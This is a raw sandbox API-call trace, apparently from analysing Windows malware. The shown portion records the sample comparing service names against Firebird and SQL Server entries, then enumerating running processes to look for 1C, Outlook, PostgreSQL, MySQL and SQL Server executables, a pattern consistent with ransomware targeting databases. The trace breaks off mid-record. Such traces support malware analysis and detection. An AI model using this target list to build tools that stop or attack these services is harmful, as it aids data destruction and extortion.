(lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0049.754] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0049.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0049.754] lstrlenW (lpString="MMCSS") returned 5 [0049.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0049.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0049.754] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0049.754] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0049.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0049.754] lstrlenW (lpString="MpsSvc") returned 6 [0049.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0049.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0049.754] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0049.754] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0049.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0049.754] lstrlenW (lpString="Netman") returned 6 [0049.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0049.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0049.754] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0049.754] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0049.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0049.755] lstrlenW (lpString="netprofm") returned 8 [0049.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0049.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0049.755] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0049.755] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0049.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0049.755] lstrlenW (lpString="NlaSvc") returned 6 [0049.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0049.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0049.755] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0049.755] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0049.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0049.755] lstrlenW (lpString="nsi") returned 3 [0049.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0049.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0049.755] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0049.755] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0049.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0049.755] lstrlenW (lpString="PcaSvc") returned 6 [0049.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0049.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0049.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0049.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0049.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0049.755] lstrlenW (lpString="PlugPlay") returned 8 [0049.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0049.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0049.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0049.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0049.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0049.755] lstrlenW (lpString="Power") returned 5 [0049.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0049.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0049.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0049.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0049.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0049.756] lstrlenW (lpString="ProfSvc") returned 7 [0049.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0049.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0049.756] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0049.756] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0049.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0049.756] lstrlenW (lpString="RpcEptMapper") returned 12 [0049.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.756] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0049.756] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0049.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0049.756] lstrlenW (lpString="RpcSs") returned 5 [0049.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0049.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0049.756] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0049.756] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0049.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0049.756] lstrlenW (lpString="SamSs") returned 5 [0049.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0049.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0049.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0049.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0049.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0049.756] lstrlenW (lpString="Schedule") returned 8 [0049.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0049.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0049.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0049.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0049.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0049.756] lstrlenW (lpString="SENS") returned 4 [0049.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0049.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0049.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0049.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0049.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0049.757] lstrlenW (lpString="ShellHWDetection") returned 16 [0049.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.757] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0049.757] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0049.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0049.757] lstrlenW (lpString="Spooler") returned 7 [0049.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0049.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0049.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0049.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0049.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0049.757] lstrlenW (lpString="swprv") returned 5 [0049.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0049.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0049.757] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0049.757] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0049.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0049.757] lstrlenW (lpString="SysMain") returned 7 [0049.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0049.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0049.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0049.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0049.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0049.757] lstrlenW (lpString="Themes") returned 6 [0049.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0049.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0049.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0049.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0049.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0049.757] lstrlenW (lpString="TrkWks") returned 6 [0049.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0049.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0049.758] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0049.758] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0049.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0049.758] lstrlenW (lpString="UxSms") returned 5 [0049.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0049.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0049.758] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0049.758] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0049.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0049.758] lstrlenW (lpString="VSS") returned 3 [0049.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0049.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0049.758] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0049.758] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0049.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0049.758] lstrlenW (lpString="WdiServiceHost") returned 14 [0049.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.758] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0049.758] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0049.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0049.758] lstrlenW (lpString="WdiSystemHost") returned 13 [0049.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.758] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0049.758] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0049.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0049.758] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0049.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.758] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0049.758] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0049.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0049.759] lstrlenW (lpString="Winmgmt") returned 7 [0049.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0049.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0049.759] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0049.759] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0049.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0049.759] lstrlenW (lpString="WPDBusEnum") returned 10 [0049.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.759] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0049.759] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0049.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0049.759] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0049.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x198 [0049.761] Process32FirstW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.762] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.763] lstrlenW (lpString="System") returned 6 [0049.763] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0049.763] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0049.763] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0049.763] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0049.763] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0049.763] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0049.763] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0049.763] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.764] lstrlenW (lpString="smss.exe") returned 8 [0049.764] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0049.764] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0049.764] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0049.764] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0049.764] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0049.764] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0049.764] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0049.764] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.765] lstrlenW (lpString="csrss.exe") returned 9 [0049.765] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0049.765] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0049.765] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0049.765] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0049.765] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0049.765] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0049.765] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0049.765] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.765] lstrlenW (lpString="wininit.exe") returned 11 [0049.765] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0049.766] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0049.766] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0049.766] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.766] lstrlenW (lpString="csrss.exe") returned 9 [0049.766] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.767] lstrlenW (lpString="winlogon.exe") returned 12 [0049.767] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.768] lstrlenW (lpString="services.exe") returned 12 [0049.768] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.768] lstrlenW (lpString="lsass.exe") returned 9 [0049.768] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0049.769] lstrlenW (lpString="lsm.exe") returned 7 [0049.769] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.770] lstrlenW (lpString="svchost.exe") returned 11 [0049.770] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.770] lstrlenW (lpString="svchost.exe") returned 11 [0049.770] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.771] lstrlenW (lpString="svchost.exe") returned 11 [0049.771] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.772] lstrlenW (lpString="svchost.exe") returned 11 [0049.772] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.772] lstrlenW (lpString="svchost.exe") returned 11 [0049.772] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.773] lstrlenW (lpString="audiodg.exe") returned 11 [0049.773] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.774] lstrlenW (lpString="svchost.exe") returned 11 [0049.774] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.774] lstrlenW (lpString="svchost.exe") returned 11 [0049.774] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.775] lstrlenW (lpString="dwm.exe") returned 7 [0049.775] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.775] lstrlenW (lpString="explorer.exe") returned 12 [0049.776] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.776] lstrlenW (lpString="spoolsv.exe") returned 11 [0049.776] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.777] lstrlenW (lpString="taskhost.exe") returned 12 [0049.777] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.777] lstrlenW (lpString="svchost.exe") returned 11 [0049.778] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0049.778] lstrlenW (lpString="taskeng.exe") returned 11 [0049.778] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.779] lstrlenW (lpString="taskhost.exe") returned 12 [0049.779] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0049.780] lstrlenW (lpString="entrepreneur.exe") returned 16 [0049.780] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0049.780] lstrlenW (lpString="andrew kinds.exe") returned 16 [0049.780] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0049.781] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0049.781] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0049.782] lstrlenW (lpString="educated.exe") returned 12 [0049.782] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0049.782] lstrlenW (lpString="servers.exe") returned 11 [0049.782] Process32NextW (in: hSnapshot=0x198, lppe=0x21dfd34 | out: 